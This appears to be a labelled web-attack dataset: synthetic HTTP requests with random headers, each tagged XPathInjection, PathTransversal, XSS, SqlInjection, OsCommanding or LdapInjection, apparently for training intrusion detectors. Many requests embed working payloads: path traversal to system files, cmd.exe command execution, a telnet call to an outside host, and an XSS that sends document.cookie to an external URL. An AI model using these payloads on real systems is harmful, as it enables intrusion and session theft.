Accept-Language: do-77tior;q=0.3, ah-vaEeeio;q=0.0
Cache-Control: min-fresh=7
Client-ip: 132.242.52.39
Cookie: H5f5Mqvcats=jxiRtmu;abwmfdtsout9eoT=mI+r
Cookie2: $Version="66"
Date: Fri, 07 Nov 08 16:37:50 CET
ETag: W/"aALg1_G.AL9vGMm"
Expect: omotegt
If-Modified-Since: Mon, 21 Nov 05 14:50:31 UTC
If-Unmodified-Since: Fri, 30 Nov 07 04:34:51 GMT
If-Match: "7DZNf81oAYIfxPIXFaN"
If-None-Match: "iQ7FoCUhFbkVaQymC"
If-Range: *
Max-Forwards: 825
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: http://www.0NcJ9e.ch/rielam/d6re3q/mtlmi.dll
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; Win 9x 6.7; rs-tn; rv:1.1.2) Gecko/74708389
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: HTTP/8.7 www.onda.css
Transfer-Encoding: compress
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44955
Start - Id: 48590
class: XPathInjection
PUT /dE-EK.KD-P9STVf5/6Fodassxpmgxclityac/o@kGqyHwjc8_QD-NQr@a/oxs6CrjiNPFaxIXrbCAq/mw0kubf.G.Bnsje/sttenp.exe? HTTP/1.1
Content-Length: 188
Content-Language: Lnlaei,st
Content-Encoding: identity
Content-Location: /groqi/paIcoi20/r4co3Na8/o7sss.ace
Content-MD5: U25mbzdsTGV0QXByZW50ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Nov 05 17:41:57 UTC
Last-Modified: Sat, 03 May 08 21:08:06 CET
Host: 54.231.184.48
Connection: 4mulwage
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 5atoTE-looBecod
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: yeuoWa=etdd;connectRM_Ix6kUTevalf=36940550;nibseaedN=ojrzi;waTpwecluiotepa=kmIinjrye0eiiv;anehiof=ltpasswdudeleteodubg qsand
Cookie2: $Version="380"
Date: Thu, 03 Feb 05 21:21:34 CET
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Fri, 12 Aug 05 14:17:39 UTC
If-Unmodified-Since: Fri, 25 Nov 05 10:52:26 UTC
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: *
Max-Forwards: 077
MIME-Version: 0.0
Pragma: x3Sy=lIy2k
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: 39-76,5-4266
Referer: http://www.iooo0te.ch/fhvle/Anetb/e0ri/skgxt.png
TE: deflate;q=0.1,trailers
Trailer: Authorization
User-Agent: wwlteow2ncob5ey
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: Orbeec/0.3 www.WAan.htm
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihleaeF=rteid/4/osne7i/child::node()[ position()=444]     |  ed6/qujntm/c/child::text()[position()=954]     or    'nltAa' ='&ne=49

End - Id: 48590
Start - Id: 45921
class: PathTransversal
GET /m7I/elttN6t/c-Rm5kOryx/e7snvdmms/h4qUFLlAHiIbI8srO@Qh/ahstkku6iutbLuednceY/ecHM1O-@DFV/atpsnieo2l8vdciyw/pth9Okfnahiuw/cstnssragiethw28pwds/yfalDnbnte/phpGNIautoexecPgboeg.png?3gtnee2r=67694&lk0=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&dtoeeeoddszhtz=aoa&ned=4 HTTP/1.0
Host: www.ein9EnodvN.org:80
Connection: close
Accept: text/*;q=0.4, text/html;q=0.8
Accept-Charset: x-mac-roman, euc-cn, cp-936, x-mac-icelandic;q=0.0, iso-8859-6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 81.172.25.192
Cookie: aiDvs=hhotriehiPcf
Cookie2: $Version="3"
Date: Wed, 06 Dec 06 06:38:58 UTC
ETag: W/"mLsp4l@CbIwwgt7c-"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Tue, 28 Dec 04 19:05:37 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:29:37 GMT
If-Match: *
If-None-Match: "nxwBQQXr5Hx9cWa"
If-Range: *
Max-Forwards: 38
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest qop=egnlfi
Range: -106180,0973-,3598-
Referer: /Ae20ohoa/h6tntpu.dll
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/1.9 (Windows; U; WinNT 2.2; oo-R9; rv:2.6.5) Gecko/68704314
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 880x5284
Via: 7.7 255.201.100.218, 4.2 www.sustCznI.jpg, HTTP/3.6 51.175.98.43
Transfer-Encoding: Afso; hr3yea=t1jia
Upgrade: dhvol/0.8, Pde/4.9
Warning: 050 www.ecuV.tiff:35147 "8mslZ" "Thu, 18 Sep 08 24:48:34 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45921
Start - Id: 46166
class: PathTransversal
GET /e49VQYCJIWiy.zZI/twisohclarzLsu/sQw6kuznXlohHredez/hath4lorrerlnps/Y9DMjsdLff3b/aKbllvM4GP/9YL_dnuqo/i53YOFug6/dtfZnudjohHs.jsp?osd3tevc8=9505&hheuqmloGl6bis=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FshOod.conf&rerhihte=8996071&tNneataee3=Bjme&rftrhalspie=fW_&egeenxeEh2en=do5sA HTTP/1.1
Host: www.ee2lieu.be
Connection: keep-alive
Accept: application/postscript, video/*
Accept-Charset: x-mac-turkish;q=0.5, windows-1257;q=0.2, iso-10646-ucs-2, isiri-3342, big5;q=0.5
Accept-Encoding: deflate;q=0.2, identity;q=0.6, gzip;q=0.8, gzip;q=0.8
Accept-Language: mt-Bn0d, i-xfns, etohA-tsl0, TiSehoWr-omEHeeot
Cache-Control: max-stale
Client-ip: 231.104.230.202
Cookie: anEseg=q etcdc/oselssnoas  iperll;Hio6tersw10e=083712;9heelem=tj6q
Cookie2: $Version="276"
Date: Mon, 28 Aug 06 12:38:52 CET
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: sccIhe@oyejc.it
If-Modified-Since: Sat, 27 May 06 07:47:44 GMT
If-Unmodified-Since: Sat, 13 Jan 07 24:59:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 06:29:27 CET
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: slso ala9=euegghy
Authorization: Digest cnonce="edgsger"
Range: -51066
Referer: http://rutaen.gov/ntnhitsa/Eash/ac7ebh/3xgm/voro.msf
TE: trailers,gzip,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (X11; U; Linux i586 2.4; et-rE; rv:5.7.4) Gecko/88558626
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 6.9 63.96.226.125
Transfer-Encoding: compress
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 7.188.220.215
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46166
Start - Id: 47685
class: XSS
GET /1TeIhavingUbB7XvoTJ/aROc1UStRYz/3imzcttetnhbwjit/aZkn/dUgvtPacBZgFoAG/0Ozwhul1Vk/alyb_ts_tc62VN04./e.f/uyd@hC-mCRSv/987peS0kYzqY.M/LtpassthruOXXDreplacesvRZ/nIrj9CcA.shtml?ihtai1se5=%3Cimg+++src%3D%22+livescript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.artaan.com%2Fcgi-bin%2Fneicor.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&iibAseglpmvet=xe&rEjteiajetd=etotentnpuryS2w&6ElptSAformd4=2&Rt=opsuxb8%5D%7Ea&e4l=c%26dlae&e@sdwgetYY=264&5onipfsos=TCpeh&rwyanralc26ts=738383&NXGBh80@window.opensstdin=nhZVCG85lECt&utsetcaomaaer=+he%5BWi HTTP/1.0
Host: 217.191.219.6
Connection: close
Accept: image/gif, video/mpeg;q=0.8
Accept-Charset: us-ascii;q=0.8, windows-874;q=0.0
Accept-Encoding: *
Accept-Language: 9sI6sec8-ialtt;q=0.9, rgq-ll9, eib8kLto-ejh;q=0.8, u2-iziew;q=0.6, n-yi
Cache-Control: no-transform
Client-ip: 90.94.4.212
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="702"
Date: Wed, 22 Feb 06 11:56:57 GMT
ETag: W/"1J-g4mVQQ066LcLj0iD8"
Expect: 100-continue
From: zlDtEnh@hmvarofRt.ch
If-Modified-Since: Tue, 13 Nov 07 02:19:42 GMT
If-Unmodified-Since: Tue, 07 Oct 08 11:38:48 UTC
If-Match: "GZpXPjgUThO8Eep"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: "xbOv3ZU1pru5rEwV8O"
Max-Forwards: 3
MIME-Version: 0.2
Pragma: osmEtiru=atSMfd
Proxy-Authorization: NTLM eXR0b2RubmMwbEhzaWVlZWUzZWhpZTJtcm5ucmluQWVzdzk2T3JlcmFUanU=
Authorization: NTLM ZW9MOWdkZW55cmdubmlyZW1oZTlpZUFlbzhnNjMxbDgwaGVlSUlvd3h0bmxU
Range: 70-,2-,3-3356
Referer: http://teioymr.cz/ozonneAe/ee1hecgh/0aeeh/heNdskzt/fsbd.mpeg
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 3.3; tc-5l; rv:7.6.8) Gecko/15481018
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 5.3 www.l1tx7en.tiff:1036, Neege/1.9 www.n9ke.tiff:28, 9.0 194.87.40.114
Transfer-Encoding: gzip
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47685
Start - Id: 35278
class: SqlInjection
GET /ei4YX@raobbmEN4qXs7/ezoqtgR7QvMZL4/rnptu9_H5SCqWK/klsoomxbetkaiocrOn5/andsouq1/owI@fjRNMR/rnoYhitsgrwrh/Enoeyv9.jpeg?5Wswwzwgetvo=OR+++++%27mrdbvDsc%27+%3D+%27+%27&apo1ea=3w&rpssetphildtgN=ec HTTP/1.0
Host: www.tawna.net:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic;q=0.8, iso-8859-7;q=0.8, euc-cn;q=0.7, iso-2022-kr;q=0.9, iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: tgr-e;q=0.1, aaaye-oNt;q=0.1, hQeIe-ttiln
Cache-Control: no-transform
Client-ip: 155.132.155.102
Cookie: 2icmaPHf=cUaryi;Qss3=417665
Cookie2: $Version="309"
Date: Sat, 02 Feb 08 03:52:59 CET
ETag: W/"K-NkvRrlLf6gBjMEc3V"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 23 Oct 05 10:13:04 CET
If-Unmodified-Since: Fri, 11 Jul 08 13:06:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 664
MIME-Version: 8.3
Pragma: ajr='elrosis7'
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://r9e6t.cz/relh6/Psshoud/a7deooTl.js
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (X11; U; Open BSD i386 2.2; nz-hi; rv:7.2.1) Gecko/78825532
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/2.9 232.39.23.92
Transfer-Encoding: compress
Upgrade: caha/7.7
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35278
Start - Id: 36594
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.buod7m.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=17
Client-ip: 3.238.183.148
Cookie: eemAtqc=sJCn@5;R25r1Dboot.ini=caoftwa=arE1xei;weyawille=072383832;tou7snoGlyxma=6go;biframelinkga;baaauterra9e=fIClNmF4R;Dmwu9passwdk@1=t0ett
Cookie2: $Version="52"
Date: Tue, 31 Jan 06 14:47:15 UTC
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Fri, 10 Nov 06 15:06:37 UTC
If-Unmodified-Since: Thu, 22 Nov 07 20:11:33 GMT
If-Match: "IXnls1olXSpM0sji"
If-None-Match: *
If-Range: *
Max-Forwards: 365
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM czRtdGlldHNTck5sbHRzZ3VlaWF0dHM2SWNlYThpcGw=
Authorization: Basic dHZyb2VpOmk0aEVpNA==
Range: -5
Referer: /draa.avi
TE: gzip
Trailer: Referer
User-Agent: mvkmoattmr/9.8.0
UA-CPU: MIPS
UA-Disp: 750,0599,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: bsh/2.5 www.ankp.shtml, 5.3 www.atfo.shtml
Transfer-Encoding: identity
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 85538465859468
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36594
Start - Id: 44004
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 73.167.217.148
Connection: close
Accept: application/x-tar;q=0.5, image/jpeg, image/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.5, deflate, gzip;q=0.4
Accept-Language: nay-d5H, je0tkw-nnwEoje, liar-xap;q=0.4, ntiw-sunpe
Cache-Control: no-transform
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="3"
Date: Sun, 18 Apr 10 08:18:59 CET
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 31 Oct 04 13:16:19 GMT
If-Match: "E@teygm54glXv28"
If-None-Match: *
If-Range: Sat, 24 Oct 09 04:00:21 GMT
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: i='64tnhai'
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: NTLM aXZySWk0Z2FkZG8xY3RjZXI4ZWlodGloclpjQWRQMHBsZXM=
Range: 67-764741,470518-20,3-202913
Referer: /8itteza/iztd/exR9ix1/taheinsr/iler.gz
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 2.6; xd-oa; rv:7.9.6) Gecko/19047044
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: deflate
Upgrade: rnr/0.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44004
Start - Id: 43445
class: OsCommanding
GET /y1qlzi3mSTODYn7L/ooma/tall/aldealL/0fandS7hUKTFDt54X.jpg?cdX7M7=2607114011&r4lthluhisk7no=%5C%22+++++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.laroat.com++++2134%5C%3B&3fedeED=gLl&tne3etntsia=i2XBWak&leSrse3oTheqara=io4T&tdhutalceu5mt=5&OQsku=534086381&efeq2=oon&np5iuwt9inneb=%3Ao&Usn=ikFpEQH&lnwhcde=984 HTTP/1.0
Host: 243.67.232.84
Connection: 3tor
Accept: audio/basic
Accept-Charset: x-mac-turkish
Accept-Encoding: *;q=0.6
Accept-Language: cwnNeta-aqgsetze;q=0.3
Cache-Control: only-if-cached
Client-ip: 107.215.79.167
Cookie: 2eoamuLaiL8gs=6s e;gaoethe0ho99=ctohtacces2e>OqeiFstst:ceO
Cookie2: $Version="05"
Date: Tue, 05 Feb 08 14:14:38 UTC
ETag: W/"mmKGIaNe9zKq2H4cG"
Expect: a9incnt
From: Etwo@t45aetl.it
If-Modified-Since: Mon, 16 Feb 09 09:19:44 CET
If-Unmodified-Since: Thu, 08 Oct 09 11:56:33 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Oct 07 14:49:18 CET
Max-Forwards: 817
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: Digest qop=alb2ja0
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.paxos.st/tesuxo/suesoed.mpg
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: fntlrse9p5/9.4.4.8.7
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: gzip
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 111.88.109.86
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43445
Start - Id: 48589
class: XPathInjection
PUT /Lftp4XJCS0HoZvform/7E/sRkelM-@BLzrk5vti/u0cmHqMeS/s2A.exe? HTTP/1.0
Content-Length: 229
Content-Language: btood,rucOrda,rgchr
Content-Encoding: deflate
Content-Location: http://Fgitli.be/twORds/5Sqa/dqin/mde4a.mdb
Content-MD5: NjVuc2hiZWhocmR1YXNFdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Oct 07 11:01:01 GMT
Last-Modified: Tue, 11 Oct 05 06:34:50 CET
Host: 146.12.241.100
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1257;q=0.4, iso-8859-4, x-mac-chinesetrad;q=0.2, iso-8859-7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 58.151.109.14
Cookie: 5Vz-SR@=cthaaira9Ra;tu=3387;m0tAtqaazd=54731257;0nn31=re]eiair1
Cookie2: $Version="380"
Date: Mon, 28 May 07 04:21:11 GMT
ETag: W/"g6dEmBv81@mImtM6koU@"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Fri, 12 Aug 05 14:17:39 UTC
If-Unmodified-Since: Fri, 25 Nov 05 10:52:26 UTC
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.0
Pragma: eRcNs='cjNo7c'
Proxy-Authorization: Digest response="7fFB26efC9Fd9d2Aac334296DcDC1b71"
Authorization: Basic N2V6cjphZXVxaWk3
Range: 39-76,5-4266
Referer: http://www.opYsnlca.uk/oseett/caureNn/h0Meh/seepTtI.pdf
TE: deflate;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/4.0 (compatible; Konqueror/3.7; Mac OS X; nnorhhei; wX1t; sisf)
UA-CPU: 68000
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 853x5228
Via: 1.9 www.ierale.css
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dgsdalv=anc&Xjtimail-eh.F=lx&dce=enhdha/tjs7ow/Tco/child::node()[position()=012]   or   'i9gt'  = '&ECdiv-Vwf6=aVPJtkSzV&qibctrsnssFrhn=a%nguaE8eha9&58ZToj=se6 abn&sAysltI=9eadoehttpsiedt6seeoSn 

End - Id: 48589
Start - Id: 48822
class: XPathInjection
GET /y-0aLAMUKlQo5open1/oqvZ34lSOp@XiV.gif?hee6EeErhe=439071&suntnTt4a=m%28dn&xl=tao&l6.f1=rhOdrmp%27+or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27sn9cnnu%27+++%3D+%27&iabtruOhxn=%2Feh%3C%3Dl5hlib&mhmpefWtnduncv=7dn&sKoseh=2neh1&f9iynau6asoehru=88&KbBByhC=eoiEAnhyrsRbde&jse2sMte=d0vensElCloia&deaekuo=opeo&jvirbEndt1N7tdh=gmbecrepeso8iewmDo&slre=eda&tthbtOlhmoMee=hcgsjtnIaccess_loghte HTTP/1.0
Host: www.GgaTl.st
Connection: kn4htur
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: cet-xat1ql, hhaeytt-4eE, ugW-xdsfi;q=0.1
Cache-Control: no-cache
Client-ip: 166.142.219.107
Cookie: jalArmpwtmt=hnia;a5odhhceeininr=csl;cnerq=tgz;otylelueand1=ocncx;PYWFXR2TzVperlY=j6XDx
Cookie2: $Version="4"
Date: Tue, 04 May 10 15:04:54 CET
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 01 Nov 06 21:58:03 GMT
If-Unmodified-Since: Mon, 23 Nov 09 08:01:33 GMT
If-Match: "u8D4cxaE9W2nrt0eDye"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: lhqdie Nadc=a0Pic
Range: 5920-3
Referer: http://www.9alalsr.it/LeeSs/agzdotn2.php4
TE: trailers,chunked;q=0.7,chunked
Trailer: If-Match
User-Agent: Mozilla/4.8 (compatible; MSIE 9.4; Windows NT; 0thFfht; aoiyueo; Eehce)
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: 2.5 www.t3hros.css, 9.6 www.t3wapDt.htm, FTP/8.4 www.einrn0a.html
Transfer-Encoding: deflate
Upgrade: ej6ash/0.0, c8tth/2.4, aem/9.4, atomei/2.3, cwtgw/0.9
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48822
Start - Id: 38072
class: LdapInjection
GET /r5uHkPWE-..sh?eegxEttrnrITiwi=49264756&wy6fn=%29+++%28%7C%28++++cn%3D*o+%27brien*+%29%28mail++%3D*o%27brien*+++%29++ HTTP/1.0
Host: www.nhtDy7sht.org:3
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad, x-mac-korean;q=0.6, euc-cn;q=0.1, iso-8859-9;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 218.10.109.173
Cookie: tQandYnh=eijclyosree15Aao;tmitLusortt=502592;t2q=uuOrldoc6p;it=fVak
Cookie2: $Version="57"
Date: Thu, 20 Jan 05 11:25:40 UTC
ETag: W/"D8v7C-3-pg8qmVMX1v"
Expect: atelnw=rOlr2ln
From: klienot@sqnSctf.com
If-Modified-Since: Mon, 26 Oct 09 16:20:08 CET
If-Unmodified-Since: Fri, 24 Mar 06 21:58:09 CET
If-Match: *
If-None-Match: *
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 3591
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic TW9nTG86YWQ2aWhp
Range: 77-,76-
Referer: http://www.To4etr.com/ewy7ysnX/Dlks/st2oss/teihtz.rar
TE: trailers,gzip
Trailer: Accept
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 2.7; ai-sr; rv:9.3.7) Gecko/31637852
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: eesaT9/1.2 www.iu4tgi.html, 9.6 www.I2srcoiS.jpeg
Transfer-Encoding: smeqt; drqd=6be66sAr
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 36.56.242.165
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38072
Start - Id: 46023
class: PathTransversal
PUT /yf2p20ntet3anhrasoA/aIkAYIhavmKTE/irgelhtea8neiwctDa/fhQ8iewpPdiwsrm/cpuJPDk3Ox2/OKc/vonntNlwesm1iwsdl/r-KA7nrSrGwDPHM-9J.css? HTTP/1.1
Content-Length: 282
Content-Language: hy,hsovomee
Content-Encoding: gzip
Content-Location: /hMeesn8H/fcezWc2/uprnoeEe.php3
Content-MD5: cmZhZXRwZXNmcTdlcG52aQ==
Content-Type: application/x-www-form-urlencoded
Host: 9.240.244.159
Connection: close
Accept: application/postscript;q=0.4, video/*
Accept-Encoding: *
Cookie: hd=../../../WINDOWS/autoexec.bat;icmnow=vUP8bAkbsm.i
Referer: http://nlsu.de/eomu/iCeTwiwA/RoOmg8ra.msf
User-Agent: Mozilla/1.8 (compatible; Konqueror/9.6; Unix; veio; ndoa1)
Via: FTP/0.6 204.14.169.41, 3.6 www.orwemOje.jpg
Transfer-Encoding: 4ltwe; tto66d4=hltit
Warning: 304 184.204.102.215 "hion7mn8cz" 
----: ---------------------------------

eented=hm?uhr5nd3j&eeZnnei=7nqK@&trieeaemaegtc=640&XKwgetp6=6465&snd=7041449&t7ist0tosiech=wnedeih0o&inZtrsf6atxasi=2nr0lv&qAehwethf=hJsfR3cnj1pE&nhyr=4978188&yteniecsorsewn=2sWdwrci0&oHecaeEehsv=rKIjk8MEMy&e4t2gE=57129&ns3Tstsrndrp=lopV1u biAD]&Indiereainqar5=Elue&ss6=517948

End - Id: 46023
Start - Id: 44038
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.inie2toeu0.cz:6742
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic, windows-1251;q=0.8, x-mac-icelandic, windows-874;q=0.7
Accept-Encoding: compress, identity
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 199.92.23.73
Cookie: iLatApTcot=26621;a2eOorjns=ltelnet2o5;rideY9=otehOi;msdEioterai4onM=Rioos;xre5fhaieaamE=/e/j ata
Cookie2: $Version="4"
Date: Tue, 26 Oct 04 22:49:03 GMT
ETag: "cZaj62310s-79KCP"
Expect: ehwes=nuc4cz
From: fasutm@u0PGri.cz
If-Modified-Since: Tue, 11 Dec 07 13:35:32 GMT
If-Unmodified-Since: Sat, 11 Apr 09 15:14:41 UTC
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
